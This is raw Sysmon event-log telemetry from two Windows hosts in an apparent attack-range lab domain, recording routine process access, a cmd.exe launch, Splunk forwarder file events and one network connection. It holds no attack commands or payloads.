07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.976{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+1f9aa4|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+175730|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+16d7a6|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07 154100x80000000000000001046017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.961{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\Temp\test"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001046016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=710ECB0FE8A7B309F44B48BEADD608C7,SHA256=AA0AEDFF3B4AD6B69A50A498DBCE77D095D7AC77219FEA45206C74A334752F01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.668{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57159-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000806147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.167{0C1E0330-F2DA-60EB-3F79-00000000D001}25401716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE343B69CA6CFD178758C15C92C8FD7,SHA256=BCAA75772CA53BBC9EDA09AD8CFECBF59BA04549FAC6DB24C79C6616E1734A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.973{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3BE271808CAEDCBEDA8807448EC297,SHA256=6F096B4BD2ED602C5B6D5DEC7B7E4A779C502E24294CCD61A36342A2FADD235D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.972{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584A2ECFD1AF641152B1951EDA786592,SHA256=0594C17B0D1896C2069894E5950507802787E693BBE9B69D1A39698A2EFA6674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.454{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B4F3FC626B4DAA96D37854091613E29,SHA256=E34BD2780BAEC370600D79212366E91285296CC2238FC07BC38BCC2BEC7F6ED3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.495{0C1E0330-F2DC-60EB-4179-00000000D001}31602328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 